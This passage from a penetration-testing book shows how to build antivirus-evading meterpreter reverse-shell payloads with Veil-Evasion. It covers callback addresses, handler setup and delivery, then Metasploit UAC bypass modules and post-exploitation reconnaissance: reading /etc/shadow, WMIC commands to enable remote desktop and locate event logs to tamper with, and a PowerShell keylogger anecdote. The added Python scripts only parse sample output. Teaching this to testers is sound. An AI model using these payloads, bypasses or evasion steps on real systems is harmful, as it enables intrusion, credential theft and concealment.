        10) native/pe_scrambler
        11) powershell/shellcode_inject/download_virtual
        12) powershell/shellcode_inject/psexec_virtual
        13) powershell/shellcode_inject/virtual
        14) python/meterpreter/rev_http
        15) python/meterpreter/rev_http_contained
        16) python/meterpreter/rev_https
        17) python/meterpreter/rev_https_contained
        18) python/meterpreter/rev_tcp
        19) python/shellcode_inject/aes_encrypt
        20) python/shellcode_inject/arc_encrypt
        21) python/shellcode_inject/base64_substitution
        22) python/shellcode_inject/des_encrypt
        23) python/shellcode_inject/flat
        24) python/shellcode_inject/letter_substitution
To obtain information on a specific payload, type info <payload number / payload 
name> or info <tab> to autocomplete the payloads that are available. You can also 
just enter the number from the list. In the following example, we entered 19 to select 
the python/shellcode_inject/aes_encrypt payload: 

    Payload: python/shellcode_inject/aes_encrypt loaded

    Required Options:

        Name             Current Value    Description
        ----             -------------    -----------
        compile_to_exe   Y                Compile to an executable
        expire_payload   X                Optional: Payloads expire after "X" days
        inject_method    Virtual          Virtual, Void, Heap
        use_pyherion     N                Use the pyherion encrypter

    Available commands:

        set         set a specific option value
        info        show information about the payload
        generate    generate payload
        back        go to the main menu
        exit        exit Veil

The exploit includes an expire_payload option. If the module is not executed by 
the target user within a specified timeframe, it is rendered inoperable. This function 
contributes to the stealthiness of the attack. 

The required options include the name of the options as well as the default values 
and descriptions. If a required value isn't completed by default, the tester will need 
to input a value before the payload can be generated. To set the value for an option, 
enter set <option name> and then type the desired value. To accept the default 
options and create the exploit, type generate at the command prompt. 

If the payload uses shellcode, you will be presented with the shellcode menu, where 
you can select msfvenom (the default shellcode) or a custom shellcode. If the custom 
shellcode option is selected, enter the shellcode in the form \x01\x02..., without 
quotes and newlines (\n). If the default msfvenom is selected, you will be prompted 
with the default payload choice of windows/meterpreter/reverse_tcp. If you wish 
to use another payload, press Tab to complete the available payloads. The available 
payloads are shown in the following screenshot: 
    [?] Use msfvenom or supply custom shellcode?

        1 - msfvenom (default)
        2 - Custom

    [>] Please enter the number of your choice: 1

    [*] Press [enter] for windows/meterpreter/reverse_tcp
    [*] Press [tab] to list available payloads

    [>] Please enter metasploit payload: windows/
    windows/adduser                  windows/patchupdllinject/
    windows/dllinject/               windows/patchupmeterpreter/
    windows/dns_txt_query_exec       windows/shell/
    windows/download_exec            windows/shell_bind_tcp
    windows/exec                     windows/shell_bind_tcp_xpfw
    windows/loadlibrary              windows/shell_reverse_tcp
    windows/messagebox               windows/speak_pwned
    windows/meterpreter/             windows/upexec/
    windows/metsvc_bind_tcp          windows/vncinject/
    windows/metsvc_reverse_tcp       windows/x64/


In the following example, the [tab] command was used to demonstrate some of the 
available payloads; however, the default (windows/meterpreter/reverse_tcp) was 
selected, as shown in the following screenshot: 

    [?] Use msfvenom or supply custom shellcode?

        1 - msfvenom (default)
        2 - Custom

    [>] Please enter the number of your choice: 1

    [*] Press [enter] for windows/meterpreter/reverse_tcp
    [*] Press [tab] to list available payloads
    [>] Please enter metasploit payload:

    [>] Enter value for 'LHOST', [tab] for local IP: 192.168.43.134
    [>] Enter value for 'LPORT': 4444

    [>] Enter extra msfvenom options in OPTION=value syntax:

    [*] Generating shellcode...
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The user will then be presented with the output menu with a prompt to choose 
the base name for the generated payload files. If the payload was Python-based 
and you selected compile_to_exe as an option, the user will have the option 
of either using PyInstaller to create the EXE file, or generating Py2Exe files, 
as shown in the following screenshot: 

    [*] Press [enter] for 'payload'
    [>] Please enter the base name for output files: update

    [?] How would you like to create your payload executable?

        1 - Pyinstaller (default)
        2 - Py2Exe

    [>] Please enter the number of your choice: 1

The final screen displays information on the generated payload, as shown in the 
following screenshot: 

    Veil-Evasion | [Version]: 2.4.3
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    [*] Executable written to: /root/veil-output/compiled/update1.exe

    Language:           python
    Payload:            python/shellcode_inject/aes_encrypt
    Shellcode:          windows/meterpreter/reverse_tcp
    Options:            LHOST=192.168.43.134 LPORT=4444
    Required Options:   compile_to_exe=Y expire_payload=X
                        inject_method=Virtual use_pyherion=N
    Payload File:       /root/veil-output/source/update1.py
    Handler File:       /root/veil-output/handlers/update1_handler.rc

    [*] Your payload files have been generated, don't get caught!
    [!] And don't submit samples to any online scanner! ;)

The exploit could also have been created directly from the command line using the 
following options: 

    ./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o output \
        --msfpayload windows/meterpreter/reverse_tcp \
        --msfoptions LHOST=192.168.43.134 LPORT=4444 
Once an exploit has been created, the tester should verify the payload against 
VirusTotal to ensure that it will not trigger an alert when it is placed on the target 
system. If the payload sample itself is submitted to VirusTotal and its behavior 
flags it as malicious software, a signature update against the submission can 
be released by antivirus (AV) vendors in as little as one hour. This is why users are 
clearly admonished with the message "don't submit samples to any online scanner!" 

Veil-Evasion allows testers to use a safer check against VirusTotal. When any payload 
is created, a SHA1 hash of it is computed and added to hashes.txt, located in the 
~/veil-output directory. Testers can invoke the checkvt command to submit only the 
hashes to VirusTotal, which checks the SHA1 values against its malware database 
without the file ever leaving the tester's system. If a Veil-Evasion payload 
triggers a match, the tester knows that it has already been seen and may be 
detected on the target. If it does not trigger a match, the exact file has not been 
submitted by anyone; that is a necessary, but not a sufficient, condition for 
bypassing the target's antivirus software. A successful lookup (no match) using the 
checkvt command is shown as follows: 



    Available commands:

        use         use a specific payload
        info        information on a specific payload
        list        list available payloads
        update      update Veil to the latest version
        clean       clean out payload folders
        checkvt     check payload hashes vs. VirusTotal
        exit        exit Veil

    [>] Please enter a command: checkvt

    [*] Checking VirusTotal for payload hashes...

    [*] No payloads found on VirusTotal!



Testing, thus far, supports the finding that if checkvt does not find a match on 
VirusTotal, the payload is unlikely to be detected by signature-based antivirus 
software on the target. Be aware of what the check does not cover: a hash lookup 
says nothing about heuristic or behavioral engines, which inspect what the 
executable does once it runs and decrypts its shellcode, so a clean checkvt result 
should still be confirmed against a copy of the target's own AV product in a lab. To 
use the payload with the Metasploit Framework, use exploit/multi/handler and set 
payload to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload 
option), with the same LHOST and LPORT used with Veil-Evasion; the handler 
resource file that Veil-Evasion writes alongside the payload can be loaded with 
msfconsole -r to do this in one step. When the listener is running, deliver the 
executable to the target system. When the target launches it, it will establish a 
reverse shell back to the attacker's system. 
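The following Python script, added here as an illustration rather than taken from Veil-Evasion, reproduces the checkvt logic offline. It hashes two constructed stand-in payload files into a hashes.txt (the sha1:filename line layout is an assumption about Veil's file) and looks the hashes up in a local set that stands in for VirusTotal's index; no network access is involved. The second file differs from the first by a single byte, so it comes back "not found" even though any signature or heuristic that catches the first would almost certainly catch it too. That is exactly why a clean checkvt result is a weaker guarantee than it looks.

```python
"""Hash-only payload check, modelled on Veil-Evasion's hashes.txt / checkvt
workflow.  Added example, not Veil-Evasion's own code."""
import hashlib
import os
import tempfile


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def sha1_file(path: str) -> str:
    """SHA1 of a file, streamed so large compiled payloads are not read whole."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def record_hash(hashes_txt: str, payload_path: str) -> str:
    """Append the payload's hash to hashes.txt.

    The 'sha1:filename' line layout is an assumption about Veil's file; the
    lookup below only needs the hash."""
    digest = sha1_file(payload_path)
    with open(hashes_txt, "a", encoding="ascii") as f:
        f.write(f"{digest}:{os.path.basename(payload_path)}\n")
    return digest


def load_hashes(hashes_txt: str) -> list:
    entries = []
    with open(hashes_txt, encoding="ascii") as f:
        for line in f:
            line = line.strip()
            if ":" not in line:
                continue
            digest, name = line.split(":", 1)
            entries.append((digest.lower(), name))
    return entries


def checkvt(entries: list, database: set) -> dict:
    """What checkvt does: ask 'has this exact hash been seen?' per payload.

    `database` stands in for VirusTotal's hash index; nothing but the hash is
    ever sent, so the sample itself is never handed to the vendors."""
    return {name: digest in database for digest, name in entries}


def demo() -> dict:
    # Constructed stand-ins for two compiled payloads; not real shellcode.
    payload_a = b"MZ" + b"\x00" * 62 + b"constructed payload body 1"
    payload_b = payload_a[:-1] + b"2"          # differs in exactly one byte
    database = {sha1_hex(payload_a)}           # 'A' was submitted by someone
    with tempfile.TemporaryDirectory() as out:
        hashes_txt = os.path.join(out, "hashes.txt")
        for name, body in (("update1.exe", payload_a), ("update2.exe", payload_b)):
            path = os.path.join(out, name)
            with open(path, "wb") as f:
                f.write(body)
            record_hash(hashes_txt, path)
        return checkvt(load_hashes(hashes_txt), database)


if __name__ == "__main__":
    print(demo())   # update1.exe is known, update2.exe is 'not found'
```

The one-byte variant is the whole lesson: hash lookup answers "has this file been uploaded", not "will this file be caught", so treat checkvt as a leak check on the payload, not as proof of evasion.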
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Summary 

In this chapter, we focused on exploits as the tool that converts the findings from 
reconnaissance into a defined action that establishes access between the tester and 
the target. 

Kali provides several tools to facilitate the development, selection, and activation 
of exploits, including the internal exploit-db database as well as several frameworks 
that simplify the use and management of the exploits. Among these frameworks, the 
Metasploit Framework and Armitage are particularly important; however, 
Veil-Evasion enhances both with its ability to bypass antivirus detection. 

The next two chapters focus on the most important part of the attacker's kill chain— the 
post-exploitation activities. This is the part of the attack where the attackers achieve 
their objective. Typical post-exploitation activities include theft and exfiltration of data 
(proprietary or financial information), horizontal escalation by taking advantage of 
poor access controls, and vertical escalation by theft of user credentials. 
Post Exploit - Action on the Objective 

In the modern world of hacking and system attacks, attackers are not as concerned 
with exploitation as they are with what can be done with that access. This is the part 
of the kill chain where the attacker achieves the full value of the attack. 

Once a system has been compromised, the attacker generally performs the 
following activities: 

• Conducts a rapid assessment to characterize the local environment 
(infrastructure, connectivity, accounts, presence of target files, and 
applications that can facilitate further attacks) 

• Locates and copies or modifies target files of interest, such as datafiles 
(proprietary data and financial information) 

• Creates additional accounts and modifies the system to support 
post-exploitation activities 

• Attempts to vertically escalate the privilege level used for access by 
capturing administrator or system-level credentials 

• Attempts to attack other data systems (horizontal escalation) by pivoting the 
attack through the compromised system to the remainder of the network 

• Installs persistent backdoors and covert channels to retain control and have 
secure communications with the compromised system (this is covered in 
Chapter 6, Post Exploit - Persistence) 

• Removes indications of the attack from the compromised system 

To be successful, the post-exploit activities require comprehensive knowledge of the 
target's operating system and file structure to ensure that protective controls can be 
bypassed. The first post-exploitation step is a reconnaissance of the compromised 
system in the context of the local network. 





In this chapter, you will learn the following: 



• How to bypass Windows User Account Control (UAC) 

• How to conduct a rapid reconnaissance of a compromised system 

• How to obtain sensitive data from a compromised system (pillaging) 

• How to create additional accounts 

• How to use Metasploit Framework to conduct post-exploitation activities 

• Vertical and horizontal escalation techniques to improve your access rights 
and increase the number of compromised accounts 

• How to use anti-forensic techniques to cover your tracks and prevent the 
compromise from being discovered 

Bypassing Windows User Account 
Control 

In Windows Vista and higher versions, Microsoft introduced Mandatory Integrity 
Control, which assigns every process an integrity level; the three that matter here 
are high, medium, and low. A high integrity process has administrator rights, a 
medium-level process runs with a standard user's rights, and a low integrity process 
is restricted so that programs such as browsers do minimal damage if they are 
compromised. 

To perform any privileged actions, a program must run as an administrator and 
comply with the UAC settings. The four UAC settings are as follows: 

• Always notify: This is the most stringent setting, and it will prompt the local 
user whenever any program wants to use higher level privileges. 

• Notify me only when programs try to make changes to my computer: 

This is the default UAC setting. It does not prompt the user when a native 
Windows program requests higher level privileges. However, it will prompt 
if a third-party program wants elevated privileges. 

• Notify me only when programs try to make changes to my computer 
(don’t dim my desktop): This is the same as the default setting, but it does 
not dim the system's monitor when prompting the user. 

• Never notify: This option reverts the system to pre-Vista days. If the user is 
an administrator, all programs will run with high integrity. 
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Therefore, immediately after exploitation, the tester (and attacker) wants to know the 
following two things: 

• Who is the user that the system has identified? 

• What rights do they have on the system? 

This can be determined using the following command: 

C:\> whoami /groups 

A compromised system is operating in a high-integrity context, as shown by the 
Mandatory Label\High Mandatory Level Label in the following screenshot: 



    C:\>whoami /groups

    GROUP INFORMATION
    -----------------

    Group Name                        Type             SID                                            Attributes
    ================================= ================ ============================================== ===============
    Everyone                          Well-known group S-1-1-0                                        Mandatory group
    dd_workstation1\ora_dba           Alias            S-1-5-21-1261573383-3819712627-1454010182-1040 Mandatory group
    BUILTIN\Administrators            Alias            S-1-5-32-544                                   Mandatory group
    BUILTIN\Users                     Alias            S-1-5-32-545                                   Mandatory group
    NT AUTHORITY\INTERACTIVE          Well-known group S-1-5-4                                        Mandatory group
    CONSOLE LOGON                     Well-known group S-1-2-1                                        Mandatory group
    NT AUTHORITY\Authenticated Users  Well-known group S-1-5-11                                       Mandatory group
    NT AUTHORITY\This Organization    Well-known group S-1-5-15                                       Mandatory group
    LOCAL                             Well-known group S-1-2-0                                        Mandatory group
    NT AUTHORITY\NTLM Authentication  Well-known group S-1-5-64-10                                    Mandatory group
    Mandatory Label\High Mandatory Level Label         S-1-16-12288



If the Label is Mandatory Label \Medium Mandatory Level, the tester will need 
to elevate from standard user privileges to administrator rights for many of the 
post-exploit steps to be successful. 

The first option to elevate privileges is to run exploit/windows/local/ask 
from Metasploit, which launches the RunAs attack. This creates an executable 
that, when invoked, runs a program that requests elevated rights through the 
normal UAC consent prompt. The executable should be created using the 
EXE::Custom option or encrypted using Veil-Evasion to avoid detection by the 
local antivirus. 

The disadvantage of the RunAs attack is that the user will be prompted that a 
program from an unknown publisher wants to make changes to the computer. 

This alert may cause the privilege escalation to be identified as an attack. 
If the system's current user is in an administrator's group, and if UAC is set to the 
default Notify me only when programs try to make changes to my computer (it will 
not work if set to Always Notify), an attacker will be able to use the Metasploit 
exploit/windows/local/bypassuac module to elevate their privileges. 

The bypassuac module creates multiple artifacts on the target system and can be 
recognized by most antivirus software. However, the exploit/windows/local/ 
bypassuac_inject module performs the same bypass from a reflective DLL running 
in memory, and it does not write the bypass to the hard disk, minimizing the 
opportunity for detection by the antivirus software. 

Some caveats when attempting to bypass the UAC controls are as follows: 

• Bypass UAC attacks do not work against Windows Vista, where the user 
needs to acknowledge every privileged access. 

• Windows 8 remains vulnerable to this attack. However, the Metasploit 
Framework attack does not presently work with Windows 8.1. If it is 
attempted, the user will be prompted to click on an OK button before the 
attack can obtain elevated privileges, which is hardly a stealthy attack. 
Attackers can modify the attack by selecting exploit/windows/local/ask, 
which will improve the chance of success. 

• When considering system-to-system movement (horizontal/lateral 
escalation), if the current user is a domain user with local admin 
privileges on other systems, you can use the existing authentication token 
to gain access and bypass UAC. Remote UAC token filtering applies to local 
accounts, not to domain accounts, so a network logon with the domain user's 
credentials receives the full administrator token on the other system. A 
common attack to achieve this is the Metasploit 
exploit/windows/local/current_user_psexec module. 
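To turn the whoami /groups check and the caveats above into a repeatable decision, the following Python (an added example, not Metasploit or Veil code) parses constructed whoami /groups output modelled on the screenshot, reads the integrity level from the S-1-16-* label SID rather than from the localisable label text, notes whether BUILTIN\Administrators is present and marked "Group used for deny only" (the mark of a UAC-filtered administrator token), and combines that with the ConsentPromptBehaviorAdmin registry value to choose between doing nothing, bypassuac, ask, or a real local privilege escalation. The sample text and the registry value are the two inputs you would collect on the target; the script itself runs anywhere.

```python
"""Decide the UAC approach from `whoami /groups` output.
Added example; not part of Metasploit or Veil-Evasion."""
import re

ADMIN_SID = "S-1-5-32-544"                       # BUILTIN\Administrators
SID_RE = re.compile(r"\bS-1-\d+(?:-\d+)+\b")
# Integrity labels are S-1-16-<RID>; the RID is the level.
INTEGRITY_RIDS = {4096: "Low", 8192: "Medium", 12288: "High", 16384: "System"}

# Constructed output, modelled on the screenshot above: an admin account whose
# token has been filtered by UAC (medium integrity, Administrators 'deny only').
SAMPLE_FILTERED_ADMIN = """\
GROUP INFORMATION
-----------------

Group Name                       Type             SID           Attributes
================================ ================ ============= ============================
Everyone                         Well-known group S-1-1-0       Mandatory group, Enabled group
BUILTIN\\Administrators          Alias            S-1-5-32-544  Group used for deny only
BUILTIN\\Users                   Alias            S-1-5-32-545  Mandatory group, Enabled group
NT AUTHORITY\\INTERACTIVE        Well-known group S-1-5-4       Mandatory group, Enabled group
Mandatory Label\\Medium Mandatory Level Label     S-1-16-8192
"""


def parse_whoami_groups(text: str):
    """Return (integrity level, {group SID: deny_only}) from `whoami /groups`."""
    level = None
    groups = {}
    for line in text.splitlines():
        m = SID_RE.search(line)
        if not m:
            continue                      # headers, rules, blank lines
        sid = m.group()
        if sid.startswith("S-1-16-"):
            level = INTEGRITY_RIDS.get(int(sid.rsplit("-", 1)[1]), sid)
        else:
            groups[sid] = "deny only" in line.lower()
    return level, groups


def uac_plan(level, groups, consent_prompt_behavior_admin=5):
    """Pick the next step the chapter describes.

    consent_prompt_behavior_admin is the REG_DWORD of that name under
    HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System:
    2 = Always notify (Vista default), 5 = Notify me only when programs try
    to make changes (Windows 7+ default), 0 = Never notify."""
    if level in ("High", "System"):
        return "elevated"                 # no UAC bypass needed
    if ADMIN_SID not in groups:
        return "standard-user"            # UAC is not the obstacle; needs a real LPE
    if consent_prompt_behavior_admin in (1, 2):
        return "ask"                      # always-notify: bypassuac fails, RunAs prompt only
    return "bypassuac"                    # filtered admin token at medium integrity


if __name__ == "__main__":
    lvl, grp = parse_whoami_groups(SAMPLE_FILTERED_ADMIN)
    print(lvl, grp[ADMIN_SID], uac_plan(lvl, grp))   # Medium True bypassuac
```

On a real target, feed the script the saved output of whoami /groups and the value of reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin; the "deny only" attribute is what distinguishes a filtered administrator from a plain standard user, and it is the case in which bypassuac is worth attempting at all.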

Conducting a rapid reconnaissance of 
a compromised system 

Once a system has been compromised, the attacker needs to gain critical information 
about that system, its network environment, users, and user accounts. Usually, 
they will enter a series of commands or a script invoking these commands from 
the shell prompt. 
If the compromised system is based on the Unix platform, typical local 
reconnaissance commands will include the following: 

Command                              Description 

cat /etc/resolv.conf                 Reviews the system's current DNS settings and search 
                                     domain. Because it is a world-readable file, reading 
                                     it will not trigger alarms. 

/etc/passwd and /etc/shadow          System files that contain the usernames and, in 
                                     /etc/shadow, the password hashes. /etc/shadow can 
                                     only be copied by a user with root-level access; 
                                     the hashes can then be cracked offline with a tool 
                                     such as John the Ripper. 

whoami and who -a                    Identify the current user and the users logged on 
                                     to the local system. 

ifconfig -a, iptables -L -n,         Provide networking information. ifconfig -a 
and netstat -r                       provides IP addressing details, iptables -L -n 
                                     lists all of the rules held in the local firewall (if 
                                     present), and netstat -r displays the routing 
                                     information maintained by the kernel. 

uname -a                             Prints the kernel version and architecture. 

ps aux                               Prints the currently running processes, their process 
                                     IDs, owners, and additional information. 

dpkg -l (Debian-based),              Identify the installed software packages. 
yum list | grep installed and 
rpm -qa --last | head (RPM-based) 

These commands contain a brief synopsis of the available options. Refer to the 
appropriate command's help file for complete information on how it can be used. 


For a Windows system, the following commands will be entered: 

Command                              Description 

whoami /all                          Lists the current user, SID, user privileges, 
                                     and groups. 

ipconfig /all and                    Display information regarding the network interfaces, 
ipconfig /displaydns                 connectivity settings, and the local DNS cache. 

netstat -bnao and                    List the ports and connections with the executable 
netstat -r                           that owns each (-b), with no name lookups (-n), for 
                                     all connections and listening ports (-a), and with 
                                     the owning process ID (-o). The -r option displays 
                                     the routing table. The -b switch requires 
                                     administrator rights. 

net view and                         Queries NBNS/SMB to locate all of the hosts in the 
net view /domain                     current workgroup or domain. All of the domains 
                                     available to the host are given by /domain. 

net user /domain                     Lists all of the users in the defined domain. 

net user %username% /domain          Obtains information on the current user if they are 
                                     part of the queried domain (if you are a local user, 
                                     then /domain is not required). It includes the logon 
                                     times, the last time that the password was changed, 
                                     the logon scripts, and the group memberships. 

net accounts                         Prints the password policy for the local system. 
                                     To print the password policy for the domain, 
                                     use net accounts /domain. 

net localgroup administrators        Prints the members of the local Administrators 
                                     group. Use the /domain switch to obtain the 
                                     administrators for the current domain. 

net group "Domain Controllers"       Prints the list of domain controllers for the 
/domain                              current domain. 

net share                            Displays the current shared folders, which may not 
                                     provide sufficient access controls for the data 
                                     shared within them, and the paths that they point to. 
Using the WMIC scripting language 

On newer systems, attackers and penetration testers take advantage of built-in 
scripting interfaces, for example, the Windows Management Instrumentation 
Command-line (WMIC), a command-line and scripting interface that simplifies 
access to Windows Management Instrumentation. If the compromised system 
supports WMIC, several commands can be used to gather information. Refer to 
the following table: 

Command                                         Description 

wmic nicconfig get ipaddress,macaddress         Obtains the IP address and MAC address 

wmic computersystem get username                Verifies the account that was compromised 

wmic netlogin get name,lastlogon                Determines who used this system last and 
                                                when they last logged on 

wmic desktop get screensaversecure,             Determines whether the screensavers are 
screensavertimeout                              password protected and what the timeout is 

wmic logon get authenticationpackage            Determines which logon methods are supported 

wmic process get caption,executablepath,        Identifies system processes 
commandline 

wmic process where name="process_name"          Terminates specific processes 
call terminate 

wmic os get name,servicepackmajorversion        Determines the system's operating system 
                                                and service pack 

wmic product get name,version                   Identifies installed software (only packages 
                                                installed through Windows Installer) 

wmic product where name="name" call             Uninstalls or removes defined software 
uninstall /nointeractive                        packages 

wmic share get /ALL                             Identifies the shares accessible by the user 

wmic /node:"machinename" path                   Enables Remote Desktop connections on a 
Win32_TerminalServiceSetting where              remote system 
AllowTSConnections="0" call 
SetAllowTSConnections "1" 

wmic nteventlog get path,filename,writeable     Finds all of the system event logs and checks 
                                                whether they can be modified (used when it is 
                                                time to cover your tracks) 


PowerShell is a scripting language built on the .NET Framework that runs from a 
console, giving the user access to the Windows filesystem and objects such as the 
registry. It is installed by default on the Windows 7 operating system and higher 
versions. PowerShell extends the scripting support and automation offered by 
WMIC by permitting the use of shell integration and interoperability on both local 
and remote targets. 

PowerShell gives testers access to a shell and scripting language on a compromised 
system. Since the interpreter is a signed, native component of the Windows operating 
system, running it does not by itself trigger antivirus software. Scripts passed on 
the command line or pulled into memory from a remote system never need to be 
written to disk, which sidesteps file-based antivirus scanning and application 
whitelisting controls that only examine executables (assuming that the execution 
policy or an administrator has not blocked the use of PowerShell). 

PowerShell supports a number of built-in functions that are referred to as cmdlets. 
One of the advantages of PowerShell is that cmdlets are aliased to common Unix 
commands, so entering the ls command will return a typical directory listing, as 
shown in the following screenshot: 

    C:\>powershell
    Windows PowerShell
    Copyright (C) 2012 Microsoft Corporation. All rights reserved.

    PS C:\> ls

        Directory: C:\

    Mode                LastWriteTime     Length Name
    ----                -------------     ------ ----
    d----        15/09/2013   7:39 PM            config
    d----        29/11/2013   1:12 PM            HarddiskVolumeShadowCopy5
    d----        11/09/2012  11:53 AM            Log
    d----        30/08/2013   3:37 PM            metasploit
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PowerShell is a rich language capable of supporting very complex operations; it is 
recommended that the user spend the time to become familiar with its use. Some of 
the simpler commands that can be used immediately following a compromise are 
described in the following table: 



Command                              Description 

Get-Host | Select Version            Identifies the version of PowerShell used 
                                     by the victim's system. Some cmdlets are 
                                     added or behave differently in different versions. 

Get-Hotfix                           Identifies the installed security patches 
                                     and system hotfixes. 

Get-Acl <path>                       Returns the owner and access control entries of a 
                                     file, directory, or registry key, showing which 
                                     group names and usernames can read or modify it. 

Get-Process, Get-Service             Lists the current processes and services. 

gwmi Win32_UserAccount               Invokes WMI to list the user accounts. 

gwmi Win32_Group                     Invokes WMI to list the SIDs, names, 
                                     and domain groups. 

Penetration testers can use Windows native commands, DLLs, .NET functions, 
WMI calls, and PowerShell cmdlets together to create PowerShell scripts with the 
extension .ps1. 




During a recent penetration test, we were prohibited from 
installing any executable software on the client's systems. We 
used a PowerShell keylogger on a compromised system to grab 
administrator-level credentials and then compromised most of the 
systems on the network. The most effective exploit and post-exploit 
scripts, including the keylogger, are part of Nikhil Mittal's Nishang 
package (https://code.google.com/p/nishang/downloads/detail?name=nishang_0.3.0.zip). 



Reconnaissance should also extend to the local network. Since you are working 
"blind," you will need to create a map of live systems and subnets that the 
compromised host can communicate with. Start by entering ifconfig -a (Unix-based 
systems) or ipconfig /all (Windows systems) at the shell prompt. This will allow 
an attacker to determine the following: 

• Whether DHCP addressing is enabled. 

• The local IP address and subnet mask, which together identify at least one 
active subnet. 

• The gateway IP address and DNS server addresses. System administrators 
usually follow a numbering convention across the network, and if an 
attacker knows one address, such as a gateway server at 172.16.21.5, they 
will ping addresses such as 172.16.20.5, 172.16.22.5, and so on to find 
additional subnets. A DNS server that sits outside the local subnet gives 
away another subnet directly. 

• The domain name used to leverage Active Directory accounts. 

If the compromised system is running Windows, the net view command can be 
used to enumerate other Windows systems on the network. Attackers use the 
netstat -rn command to review the routing table, which may contain static 
routes to networks or systems of interest. 
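As an added example (not from the book or any tool it names), the following Python parses a constructed ipconfig /all excerpt on the attacker's side, computes the local subnet, lists which of the learned addresses fall outside it (each one gives away another subnet; the /24 assumed for those networks is a guess until they are probed), and produces the neighbouring-subnet candidates that the numbering-convention trick described above would have you ping next.

```python
"""Local-network picture from `ipconfig /all` output. Added example; not from
the book or any tool it names."""
import ipaddress

# Constructed `ipconfig /all` excerpt (Windows 7 layout), not a real capture.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : dd_workstation1
   Primary Dns Suffix  . . . . . . . : corp.example

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : corp.example
   Physical Address. . . . . . . . . : 00-0C-29-3A-1B-2C
   DHCP Enabled. . . . . . . . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::1c2b:3a4d:5e6f:7081%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 172.16.21.57(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.21.5
   DNS Servers . . . . . . . . . . . : 172.16.21.10
                                       172.16.20.10
"""


def parse_ipconfig_all(text: str) -> dict:
    """Pull out the fields the chapter asks for (first adapter with an IPv4 address)."""
    info = {"dhcp": None, "ipv4": None, "mask": None, "gateway": None,
            "dns": [], "domain": None}
    last_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if ":" not in line:                      # continuation of a multi-value field
            if last_key == "dns servers":
                info["dns"].append(line)
            continue
        key, _, value = line.partition(":")      # first colon ends the dotted label
        key = key.rstrip(" .").lower()
        value = value.strip()
        last_key = key
        if key == "dhcp enabled":
            info["dhcp"] = value.lower() == "yes"
        elif key == "ipv4 address" and info["ipv4"] is None:
            info["ipv4"] = value.split("(")[0]   # drop '(Preferred)'
        elif key == "subnet mask" and info["mask"] is None:
            info["mask"] = value
        elif key == "default gateway" and value:
            info["gateway"] = value
        elif key == "dns servers" and value:
            info["dns"].append(value)
        elif key in ("primary dns suffix", "connection-specific dns suffix") and value:
            info["domain"] = info["domain"] or value
    return info


def local_network(info: dict) -> ipaddress.IPv4Network:
    return ipaddress.ip_interface(f"{info['ipv4']}/{info['mask']}").network


def other_subnets(info: dict, prefixlen: int = 24) -> list:
    """Learned addresses outside the local subnet each reveal another subnet.
    prefixlen is an assumption: the real mask is unknown until the subnet is probed."""
    net = local_network(info)
    found = set()
    for addr in [info["gateway"], *info["dns"]]:
        if addr and ipaddress.ip_address(addr) not in net:
            found.add(str(ipaddress.ip_network(f"{addr}/{prefixlen}", strict=False)))
    return sorted(found)


def neighbour_guesses(gateway: str, spread: int = 1) -> list:
    """The numbering-convention guess from the chapter: keep the host part of the
    gateway and vary the third octet (172.16.21.5 -> 172.16.20.5, 172.16.22.5)."""
    o = list(ipaddress.IPv4Address(gateway).packed)
    out = []
    for delta in range(-spread, spread + 1):
        third = o[2] + delta
        if delta != 0 and 0 <= third <= 255:
            out.append(str(ipaddress.IPv4Address(bytes([o[0], o[1], third, o[3]]))))
    return out


if __name__ == "__main__":
    info = parse_ipconfig_all(SAMPLE_IPCONFIG)
    print(local_network(info), other_subnets(info), neighbour_guesses(info["gateway"]))
```

Run it against the saved output of ipconfig /all from the compromised host; the off-subnet DNS server is a confirmed second subnet, while the neighbour guesses are only candidates that still need a ping sweep or ARP scan to confirm.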

The local network can be scanned using nmap; its ARP ping (-PR, which nmap 
uses by default for targets on the local Ethernet segment) finds hosts that ignore 
ICMP and TCP probes. In addition, Kali has several tools that can be used for 
SNMP endpoint analysis, including nmap, onesixtyone, and snmpcheck. 

Deploying a packet sniffer to map traffic will help you identify hostnames, active 
subnets, and domain names. If DHCP addressing is not enabled, it will also allow 
attackers to identify any unused, static IP addresses. Kali is preconfigured with 
Wireshark (a GUI-based packet sniffer) but you can also use tshark in a post- 
exploitation script or from the command line, as shown in the following screenshot: 

    root@kali:~# tshark -i 1 -VV -w traffic_out
    Running as user "root" and group "root". This could be dangerous.
    Capturing on eth0
    Frame 1: 84 bytes on wire (672 bits), 84 bytes captured (672 bits) on interface 0
        Interface id: 0
        WTAP_ENCAP: 1
        Arrival Time: Sep 13, 2013 03:32:34.524557000 EDT
        [Time shift for this packet: 0.000000000 seconds]
        Epoch Time: 1379057554.524557000 seconds
        [Time delta from previous captured frame: 0.000000000 seconds]
        [Time delta from previous displayed frame: 0.000000000 seconds]
        [Time since reference or first frame: 0.000000000 seconds]
        Frame Number: 1
        Frame Length: 84 bytes (672 bits)
        Capture Length: 84 bytes (672 bits)
        [Frame is marked: False]
        [Frame is ignored: False]
        [Protocols in frame: eth:ipv6:udp:dns]



Chapter 5 



Finding and taking sensitive data - pillaging the target 

The term pillaging (sometimes known as pilfering) is a holdover from the days when 
hackers who had successfully compromised a system saw themselves as pirates racing 
to their target to steal or damage as much data as possible. The terms have survived as 
a reference to the much more careful practice of stealing or modifying proprietary or 
financial data when the objective of the exploit has been achieved. 

The attacker can then focus on the secondary target — system files that will provide 
information to support additional attacks. The choice of the secondary files will 
depend on the operating system of the target. For example, if the compromised 
system is Unix, then the attacker will also target the following: 

• The system and configuration files (usually in the /etc directory, but 
depending on the implementation, they may be in /usr/local/etc or 
other locations) 

